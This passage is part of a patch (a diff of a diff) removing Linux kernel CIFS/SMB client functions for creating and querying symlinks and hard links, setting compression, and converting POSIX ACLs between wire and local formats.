+-		name_len++;     /* trailing null */
+-		name_len *= 2;
+-		pSMB->OldFileName[name_len] = 0x04;     /* pad */
+-		/* protocol requires ASCII signature byte on Unicode string */
+-		pSMB->OldFileName[name_len + 1] = 0x00;
+-		name_len2 =
+-		    cifsConvertToUTF16((__le16 *)&pSMB->OldFileName[name_len+2],
+-				       toName, PATH_MAX, nls_codepage, remap);
+-		name_len2 += 1 /* trailing null */  + 1 /* Signature word */ ;
+-		name_len2 *= 2; /* convert to bytes */
+-	} else {
+-		name_len = copy_path_name(pSMB->OldFileName, fromName);
+-		pSMB->OldFileName[name_len] = 0x04;  /* 2nd buffer format */
+-		name_len2 = copy_path_name(pSMB->OldFileName+name_len+1, toName);
+-		name_len2++;    /* signature byte */
+-	}
+-
+-	count = 1 /* 1st signature byte */  + name_len + name_len2;
+-	inc_rfc1001_len(pSMB, count);
+-	pSMB->ByteCount = cpu_to_le16(count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-		(struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in copy = %d with %d files copied\n",
+-			 rc, le16_to_cpu(pSMBr->CopyCount));
+-	}
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto copyRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSUnixCreateSymLink(const unsigned int xid, struct cifs_tcon *tcon,
+-		      const char *fromName, const char *toName,
+-		      const struct nls_table *nls_codepage, int remap)
+-{
+-	TRANSACTION2_SPI_REQ *pSMB = NULL;
+-	TRANSACTION2_SPI_RSP *pSMBr = NULL;
+-	char *data_offset;
+-	int name_len;
+-	int name_len_target;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, param_offset, offset, byte_count;
+-
+-	cifs_dbg(FYI, "In Symlink Unix style\n");
+-createSymLinkRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->FileName, fromName,
+-				/* find define for this maxpathcomponent */
+-					PATH_MAX, nls_codepage, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, fromName);
+-	}
+-	params = 6 + name_len;
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_spi_req,
+-				InformationLevel) - 4;
+-	offset = param_offset + params;
+-
+-	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
+-	data_offset = (char *)pSMB + offset + 4;
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len_target =
+-		    cifsConvertToUTF16((__le16 *) data_offset, toName,
+-				/* find define for this maxpathcomponent */
+-					PATH_MAX, nls_codepage, remap);
+-		name_len_target++;	/* trailing null */
+-		name_len_target *= 2;
+-	} else {
+-		name_len_target = copy_path_name(data_offset, toName);
+-	}
+-
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max on data count below from sess */
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
+-	byte_count = 3 /* pad */  + params + name_len_target;
+-	pSMB->DataCount = cpu_to_le16(name_len_target);
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_UNIX_LINK);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_symlinks);
+-	if (rc)
+-		cifs_dbg(FYI, "Send error in SetPathInfo create symlink = %d\n",
+-			 rc);
+-
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto createSymLinkRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSUnixCreateHardLink(const unsigned int xid, struct cifs_tcon *tcon,
+-		       const char *fromName, const char *toName,
+-		       const struct nls_table *nls_codepage, int remap)
+-{
+-	TRANSACTION2_SPI_REQ *pSMB = NULL;
+-	TRANSACTION2_SPI_RSP *pSMBr = NULL;
+-	char *data_offset;
+-	int name_len;
+-	int name_len_target;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, param_offset, offset, byte_count;
+-
+-	cifs_dbg(FYI, "In Create Hard link Unix style\n");
+-createHardLinkRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len = cifsConvertToUTF16((__le16 *) pSMB->FileName, toName,
+-					      PATH_MAX, nls_codepage, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, toName);
+-	}
+-	params = 6 + name_len;
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_spi_req,
+-				InformationLevel) - 4;
+-	offset = param_offset + params;
+-
+-	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
+-	data_offset = (char *)pSMB + offset + 4;
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len_target =
+-		    cifsConvertToUTF16((__le16 *) data_offset, fromName,
+-				       PATH_MAX, nls_codepage, remap);
+-		name_len_target++;	/* trailing null */
+-		name_len_target *= 2;
+-	} else {
+-		name_len_target = copy_path_name(data_offset, fromName);
+-	}
+-
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max on data count below from sess*/
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
+-	byte_count = 3 /* pad */  + params + name_len_target;
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->DataCount = cpu_to_le16(name_len_target);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_UNIX_HLINK);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_hardlinks);
+-	if (rc)
+-		cifs_dbg(FYI, "Send error in SetPathInfo (hard link) = %d\n",
+-			 rc);
+-
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto createHardLinkRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSCreateHardLink(const unsigned int xid, struct cifs_tcon *tcon,
+-		   const char *from_name, const char *to_name,
+-		   struct cifs_sb_info *cifs_sb)
+-{
+-	int rc = 0;
+-	NT_RENAME_REQ *pSMB = NULL;
+-	RENAME_RSP *pSMBr = NULL;
+-	int bytes_returned;
+-	int name_len, name_len2;
+-	__u16 count;
+-	int remap = cifs_remap(cifs_sb);
+-
+-	cifs_dbg(FYI, "In CIFSCreateHardLink\n");
+-winCreateHardLinkRetry:
+-
+-	rc = smb_init(SMB_COM_NT_RENAME, 4, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->SearchAttributes =
+-	    cpu_to_le16(ATTR_READONLY | ATTR_HIDDEN | ATTR_SYSTEM |
+-			ATTR_DIRECTORY);
+-	pSMB->Flags = cpu_to_le16(CREATE_HARD_LINK);
+-	pSMB->ClusterCount = 0;
+-
+-	pSMB->BufferFormat = 0x04;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->OldFileName, from_name,
+-				       PATH_MAX, cifs_sb->local_nls, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-
+-		/* protocol specifies ASCII buffer format (0x04) for unicode */
+-		pSMB->OldFileName[name_len] = 0x04;
+-		pSMB->OldFileName[name_len + 1] = 0x00; /* pad */
+-		name_len2 =
+-		    cifsConvertToUTF16((__le16 *)&pSMB->OldFileName[name_len+2],
+-				       to_name, PATH_MAX, cifs_sb->local_nls,
+-				       remap);
+-		name_len2 += 1 /* trailing null */  + 1 /* Signature word */ ;
+-		name_len2 *= 2;	/* convert to bytes */
+-	} else {
+-		name_len = copy_path_name(pSMB->OldFileName, from_name);
+-		pSMB->OldFileName[name_len] = 0x04;	/* 2nd buffer format */
+-		name_len2 = copy_path_name(pSMB->OldFileName+name_len+1, to_name);
+-		name_len2++;	/* signature byte */
+-	}
+-
+-	count = 1 /* string type byte */  + name_len + name_len2;
+-	inc_rfc1001_len(pSMB, count);
+-	pSMB->ByteCount = cpu_to_le16(count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_hardlinks);
+-	if (rc)
+-		cifs_dbg(FYI, "Send error in hard link (NT rename) = %d\n", rc);
+-
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto winCreateHardLinkRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBUnixQuerySymLink(const unsigned int xid, struct cifs_tcon *tcon,
+-			const unsigned char *searchName, char **symlinkinfo,
+-			const struct nls_table *nls_codepage, int remap)
+-{
+-/* SMB_QUERY_FILE_UNIX_LINK */
+-	TRANSACTION2_QPI_REQ *pSMB = NULL;
+-	TRANSACTION2_QPI_RSP *pSMBr = NULL;
+-	int rc = 0;
+-	int bytes_returned;
+-	int name_len;
+-	__u16 params, byte_count;
+-	char *data_start;
+-
+-	cifs_dbg(FYI, "In QPathSymLinkInfo (Unix) for path %s\n", searchName);
+-
+-querySymLinkRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-			cifsConvertToUTF16((__le16 *) pSMB->FileName,
+-					   searchName, PATH_MAX, nls_codepage,
+-					   remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, searchName);
+-	}
+-
+-	params = 2 /* level */  + 4 /* rsrvd */  + name_len /* incl null */ ;
+-	pSMB->TotalDataCount = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	pSMB->MaxDataCount = cpu_to_le16(CIFSMaxBufSize);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(
+-	struct smb_com_transaction2_qpi_req, InformationLevel) - 4);
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_UNIX_LINK);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in QuerySymLinkInfo = %d\n", rc);
+-	} else {
+-		/* decode response */
+-
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-		/* BB also check enough total bytes returned */
+-		if (rc || get_bcc(&pSMBr->hdr) < 2)
+-			rc = -EIO;
+-		else {
+-			bool is_unicode;
+-			u16 count = le16_to_cpu(pSMBr->t2.DataCount);
+-
+-			data_start = ((char *) &pSMBr->hdr.Protocol) +
+-					   le16_to_cpu(pSMBr->t2.DataOffset);
+-
+-			if (pSMBr->hdr.Flags2 & SMBFLG2_UNICODE)
+-				is_unicode = true;
+-			else
+-				is_unicode = false;
+-
+-			/* BB FIXME investigate remapping reserved chars here */
+-			*symlinkinfo = cifs_strndup_from_utf16(data_start,
+-					count, is_unicode, nls_codepage);
+-			if (!*symlinkinfo)
+-				rc = -ENOMEM;
+-		}
+-	}
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto querySymLinkRetry;
+-	return rc;
+-}
+-
+-/*
+- *	Recent Windows versions now create symlinks more frequently
+- *	and they use the "reparse point" mechanism below.  We can of course
+- *	do symlinks nicely to Samba and other servers which support the
+- *	CIFS Unix Extensions and we can also do SFU symlinks and "client only"
+- *	"MF" symlinks optionally, but for recent Windows we really need to
+- *	reenable the code below and fix the cifs_symlink callers to handle this.
+- *	In the interim this code has been moved to its own config option so
+- *	it is not compiled in by default until callers fixed up and more tested.
+- */
+-int
+-CIFSSMBQuerySymLink(const unsigned int xid, struct cifs_tcon *tcon,
+-		    __u16 fid, char **symlinkinfo,
+-		    const struct nls_table *nls_codepage)
+-{
+-	int rc = 0;
+-	int bytes_returned;
+-	struct smb_com_transaction_ioctl_req *pSMB;
+-	struct smb_com_transaction_ioctl_rsp *pSMBr;
+-	bool is_unicode;
+-	unsigned int sub_len;
+-	char *sub_start;
+-	struct reparse_symlink_data *reparse_buf;
+-	struct reparse_posix_data *posix_buf;
+-	__u32 data_offset, data_count;
+-	char *end_of_smb;
+-
+-	cifs_dbg(FYI, "In Windows reparse style QueryLink for fid %u\n", fid);
+-	rc = smb_init(SMB_COM_NT_TRANSACT, 23, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->TotalParameterCount = 0 ;
+-	pSMB->TotalDataCount = 0;
+-	pSMB->MaxParameterCount = cpu_to_le32(2);
+-	/* BB find exact data count max from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le32(CIFSMaxBufSize & 0xFFFFFF00);
+-	pSMB->MaxSetupCount = 4;
+-	pSMB->Reserved = 0;
+-	pSMB->ParameterOffset = 0;
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 4;
+-	pSMB->SubCommand = cpu_to_le16(NT_TRANSACT_IOCTL);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->FunctionCode = cpu_to_le32(FSCTL_GET_REPARSE_POINT);
+-	pSMB->IsFsctl = 1; /* FSCTL */
+-	pSMB->IsRootFlag = 0;
+-	pSMB->Fid = fid; /* file handle always le */
+-	pSMB->ByteCount = 0;
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in QueryReparseLinkInfo = %d\n", rc);
+-		goto qreparse_out;
+-	}
+-
+-	data_offset = le32_to_cpu(pSMBr->DataOffset);
+-	data_count = le32_to_cpu(pSMBr->DataCount);
+-	if (get_bcc(&pSMBr->hdr) < 2 || data_offset > 512) {
+-		/* BB also check enough total bytes returned */
+-		rc = -EIO;	/* bad smb */
+-		goto qreparse_out;
+-	}
+-	if (!data_count || (data_count > 2048)) {
+-		rc = -EIO;
+-		cifs_dbg(FYI, "Invalid return data count on get reparse info ioctl\n");
+-		goto qreparse_out;
+-	}
+-	end_of_smb = 2 + get_bcc(&pSMBr->hdr) + (char *)&pSMBr->ByteCount;
+-	reparse_buf = (struct reparse_symlink_data *)
+-				((char *)&pSMBr->hdr.Protocol + data_offset);
+-	if ((char *)reparse_buf >= end_of_smb) {
+-		rc = -EIO;
+-		goto qreparse_out;
+-	}
+-	if (reparse_buf->ReparseTag == cpu_to_le32(IO_REPARSE_TAG_NFS)) {
+-		cifs_dbg(FYI, "NFS style reparse tag\n");
+-		posix_buf =  (struct reparse_posix_data *)reparse_buf;
+-
+-		if (posix_buf->InodeType != cpu_to_le64(NFS_SPECFILE_LNK)) {
+-			cifs_dbg(FYI, "unsupported file type 0x%llx\n",
+-				 le64_to_cpu(posix_buf->InodeType));
+-			rc = -EOPNOTSUPP;
+-			goto qreparse_out;
+-		}
+-		is_unicode = true;
+-		sub_len = le16_to_cpu(reparse_buf->ReparseDataLength);
+-		if (posix_buf->PathBuffer + sub_len > end_of_smb) {
+-			cifs_dbg(FYI, "reparse buf beyond SMB\n");
+-			rc = -EIO;
+-			goto qreparse_out;
+-		}
+-		*symlinkinfo = cifs_strndup_from_utf16(posix_buf->PathBuffer,
+-				sub_len, is_unicode, nls_codepage);
+-		goto qreparse_out;
+-	} else if (reparse_buf->ReparseTag !=
+-			cpu_to_le32(IO_REPARSE_TAG_SYMLINK)) {
+-		rc = -EOPNOTSUPP;
+-		goto qreparse_out;
+-	}
+-
+-	/* Reparse tag is NTFS symlink */
+-	sub_start = le16_to_cpu(reparse_buf->SubstituteNameOffset) +
+-				reparse_buf->PathBuffer;
+-	sub_len = le16_to_cpu(reparse_buf->SubstituteNameLength);
+-	if (sub_start + sub_len > end_of_smb) {
+-		cifs_dbg(FYI, "reparse buf beyond SMB\n");
+-		rc = -EIO;
+-		goto qreparse_out;
+-	}
+-	if (pSMBr->hdr.Flags2 & SMBFLG2_UNICODE)
+-		is_unicode = true;
+-	else
+-		is_unicode = false;
+-
+-	/* BB FIXME investigate remapping reserved chars here */
+-	*symlinkinfo = cifs_strndup_from_utf16(sub_start, sub_len, is_unicode,
+-					       nls_codepage);
+-	if (!*symlinkinfo)
+-		rc = -ENOMEM;
+-qreparse_out:
+-	cifs_buf_release(pSMB);
+-
+-	/*
+-	 * Note: On -EAGAIN error only caller can retry on handle based calls
+-	 * since file handle passed in no longer valid.
+-	 */
+-	return rc;
+-}
+-
+-int
+-CIFSSMB_set_compression(const unsigned int xid, struct cifs_tcon *tcon,
+-		    __u16 fid)
+-{
+-	int rc = 0;
+-	int bytes_returned;
+-	struct smb_com_transaction_compr_ioctl_req *pSMB;
+-	struct smb_com_transaction_ioctl_rsp *pSMBr;
+-
+-	cifs_dbg(FYI, "Set compression for %u\n", fid);
+-	rc = smb_init(SMB_COM_NT_TRANSACT, 23, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->compression_state = cpu_to_le16(COMPRESSION_FORMAT_DEFAULT);
+-
+-	pSMB->TotalParameterCount = 0;
+-	pSMB->TotalDataCount = cpu_to_le32(2);
+-	pSMB->MaxParameterCount = 0;
+-	pSMB->MaxDataCount = 0;
+-	pSMB->MaxSetupCount = 4;
+-	pSMB->Reserved = 0;
+-	pSMB->ParameterOffset = 0;
+-	pSMB->DataCount = cpu_to_le32(2);
+-	pSMB->DataOffset =
+-		cpu_to_le32(offsetof(struct smb_com_transaction_compr_ioctl_req,
+-				compression_state) - 4);  /* 84 */
+-	pSMB->SetupCount = 4;
+-	pSMB->SubCommand = cpu_to_le16(NT_TRANSACT_IOCTL);
+-	pSMB->ParameterCount = 0;
+-	pSMB->FunctionCode = cpu_to_le32(FSCTL_SET_COMPRESSION);
+-	pSMB->IsFsctl = 1; /* FSCTL */
+-	pSMB->IsRootFlag = 0;
+-	pSMB->Fid = fid; /* file handle always le */
+-	/* 3 byte pad, followed by 2 byte compress state */
+-	pSMB->ByteCount = cpu_to_le16(5);
+-	inc_rfc1001_len(pSMB, 5);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc)
+-		cifs_dbg(FYI, "Send error in SetCompression = %d\n", rc);
+-
+-	cifs_buf_release(pSMB);
+-
+-	/*
+-	 * Note: On -EAGAIN error only caller can retry on handle based calls
+-	 * since file handle passed in no longer valid.
+-	 */
+-	return rc;
+-}
+-
+-
+-#ifdef CONFIG_CIFS_POSIX
+-
+-/*Convert an Access Control Entry from wire format to local POSIX xattr format*/
+-static void cifs_convert_ace(struct posix_acl_xattr_entry *ace,
+-			     struct cifs_posix_ace *cifs_ace)
+-{
+-	/* u8 cifs fields do not need le conversion */
+-	ace->e_perm = cpu_to_le16(cifs_ace->cifs_e_perm);
+-	ace->e_tag  = cpu_to_le16(cifs_ace->cifs_e_tag);
+-	ace->e_id   = cpu_to_le32(le64_to_cpu(cifs_ace->cifs_uid));
+-/*
+-	cifs_dbg(FYI, "perm %d tag %d id %d\n",
+-		 ace->e_perm, ace->e_tag, ace->e_id);
+-*/
+-
+-	return;
+-}
+-
+-/* Convert ACL from CIFS POSIX wire format to local Linux POSIX ACL xattr */
+-static int cifs_copy_posix_acl(char *trgt, char *src, const int buflen,
+-			       const int acl_type, const int size_of_data_area)
+-{
+-	int size =  0;
+-	int i;
+-	__u16 count;
+-	struct cifs_posix_ace *pACE;
+-	struct cifs_posix_acl *cifs_acl = (struct cifs_posix_acl *)src;
+-	struct posix_acl_xattr_header *local_acl = (void *)trgt;
+-
+-	if (le16_to_cpu(cifs_acl->version) != CIFS_ACL_VERSION)
+-		return -EOPNOTSUPP;
+-
+-	if (acl_type == ACL_TYPE_ACCESS) {
+-		count = le16_to_cpu(cifs_acl->access_entry_count);
+-		pACE = &cifs_acl->ace_array[0];
+-		size = sizeof(struct cifs_posix_acl);
+-		size += sizeof(struct cifs_posix_ace) * count;
+-		/* check if we would go beyond end of SMB */
+-		if (size_of_data_area < size) {
+-			cifs_dbg(FYI, "bad CIFS POSIX ACL size %d vs. %d\n",
+-				 size_of_data_area, size);
+-			return -EINVAL;
+-		}
+-	} else if (acl_type == ACL_TYPE_DEFAULT) {
+-		count = le16_to_cpu(cifs_acl->access_entry_count);
+-		size = sizeof(struct cifs_posix_acl);
+-		size += sizeof(struct cifs_posix_ace) * count;
+-/* skip past access ACEs to get to default ACEs */
+-		pACE = &cifs_acl->ace_array[count];
+-		count = le16_to_cpu(cifs_acl->default_entry_count);
+-		size += sizeof(struct cifs_posix_ace) * count;
+-		/* check if we would go beyond end of SMB */
+-		if (size_of_data_area < size)
+-			return -EINVAL;
+-	} else {
+-		/* illegal type */
+-		return -EINVAL;
+-	}
+-
+-	size = posix_acl_xattr_size(count);
+-	if ((buflen == 0) || (local_acl == NULL)) {
+-		/* used to query ACL EA size */
+-	} else if (size > buflen) {
+-		return -ERANGE;
+-	} else /* buffer big enough */ {
+-		struct posix_acl_xattr_entry *ace = (void *)(local_acl + 1);
+-
+-		local_acl->a_version = cpu_to_le32(POSIX_ACL_XATTR_VERSION);
+-		for (i = 0; i < count ; i++) {
+-			cifs_convert_ace(&ace[i], pACE);
+-			pACE++;
+-		}
+-	}
+-	return size;
+-}
+-
+-static void convert_ace_to_cifs_ace(struct cifs_posix_ace *cifs_ace,
+-				     const struct posix_acl_xattr_entry *local_ace)
+-{
+-	cifs_ace->cifs_e_perm = le16_to_cpu(local_ace->e_perm);
+-	cifs_ace->cifs_e_tag =  le16_to_cpu(local_ace->e_tag);
+-	/* BB is there a better way to handle the large uid? */
+-	if (local_ace->e_id == cpu_to_le32(-1)) {
+-	/* Probably no need to le convert -1 on any arch but can not hurt */
+-		cifs_ace->cifs_uid = cpu_to_le64(-1);
+-	} else
+-		cifs_ace->cifs_uid = cpu_to_le64(le32_to_cpu(local_ace->e_id));
+-/*
+-	cifs_dbg(FYI, "perm %d tag %d id %d\n",
+-		 ace->e_perm, ace->e_tag, ace->e_id);
+-*/
+-}
+-
+-/* Convert ACL from local Linux POSIX xattr to CIFS POSIX ACL wire format */
+-static __u16 ACL_to_cifs_posix(char *parm_data, const char *pACL,
+-			       const int buflen, const int acl_type)
+-{
+-	__u16 rc = 0;
+-	struct cifs_posix_acl *cifs_acl = (struct cifs_posix_acl *)parm_data;
+-	struct posix_acl_xattr_header *local_acl = (void *)pACL;
+-	struct posix_acl_xattr_entry *ace = (void *)(local_acl + 1);
+-	int count;
+-	int i;
+-
+-	if ((buflen == 0) || (pACL == NULL) || (cifs_acl == NULL))
+-		return 0;
+-
+-	count = posix_acl_xattr_count((size_t)buflen);
+-	cifs_dbg(FYI, "setting acl with %d entries from buf of length %d and version of %d\n",
+-		 count, buflen, le32_to_cpu(local_acl->a_version));
+-	if (le32_to_cpu(local_acl->a_version) != 2) {
+-		cifs_dbg(FYI, "unknown POSIX ACL version %d\n",
+-			 le32_to_cpu(local_acl->a_version));
+-		return 0;
+-	}
+-	cifs_acl->version = cpu_to_le16(1);
+-	if (acl_type == ACL_TYPE_ACCESS) {
+-		cifs_acl->access_entry_count = cpu_to_le16(count);
+-		cifs_acl->default_entry_count = cpu_to_le16(0xFFFF);
+-	} else if (acl_type == ACL_TYPE_DEFAULT) {
+-		cifs_acl->default_entry_count = cpu_to_le16(count);
+-		cifs_acl->access_entry_count = cpu_to_le16(0xFFFF);
+-	} else {
+-		cifs_dbg(FYI, "unknown ACL type %d\n", acl_type);
+-		return 0;
+-	}
+-	for (i = 0; i < count; i++)
+-		convert_ace_to_cifs_ace(&cifs_acl->ace_array[i], &ace[i]);
+-	if (rc == 0) {
+-		rc = (__u16)(count * sizeof(struct cifs_posix_ace));
+-		rc += sizeof(struct cifs_posix_acl);
+-		/* BB add check to make sure ACL does not overflow SMB */
+-	}
+-	return rc;
+-}
+-
+-int
+-CIFSSMBGetPosixACL(const unsigned int xid, struct cifs_tcon *tcon,
+-		   const unsigned char *searchName,
+-		   char *acl_inf, const int buflen, const int acl_type,
+-		   const struct nls_table *nls_codepage, int remap)
+-{
+-/* SMB_QUERY_POSIX_ACL */
+-	TRANSACTION2_QPI_REQ *pSMB = NULL;
+-	TRANSACTION2_QPI_RSP *pSMBr = NULL;
+-	int rc = 0;
+-	int bytes_returned;
+-	int name_len;
+-	__u16 params, byte_count;
+-
+-	cifs_dbg(FYI, "In GetPosixACL (Unix) for path %s\n", searchName);
+-
+-queryAclRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		(void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-			cifsConvertToUTF16((__le16 *) pSMB->FileName,
+-					   searchName, PATH_MAX, nls_codepage,
+-					   remap);
+-		name_len++;     /* trailing null */
+-		name_len *= 2;
+-		pSMB->FileName[name_len] = 0;
+-		pSMB->FileName[name_len+1] = 0;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, searchName);
+-	}
+-
+-	params = 2 /* level */  + 4 /* rsrvd */  + name_len /* incl null */ ;
+-	pSMB->TotalDataCount = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max data count below from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(4000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	pSMB->ParameterOffset = cpu_to_le16(
+-		offsetof(struct smb_com_transaction2_qpi_req,
+-			 InformationLevel) - 4);
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_POSIX_ACL);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-		(struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_acl_get);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in Query POSIX ACL = %d\n", rc);
+-	} else {
+-		/* decode response */
+-
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
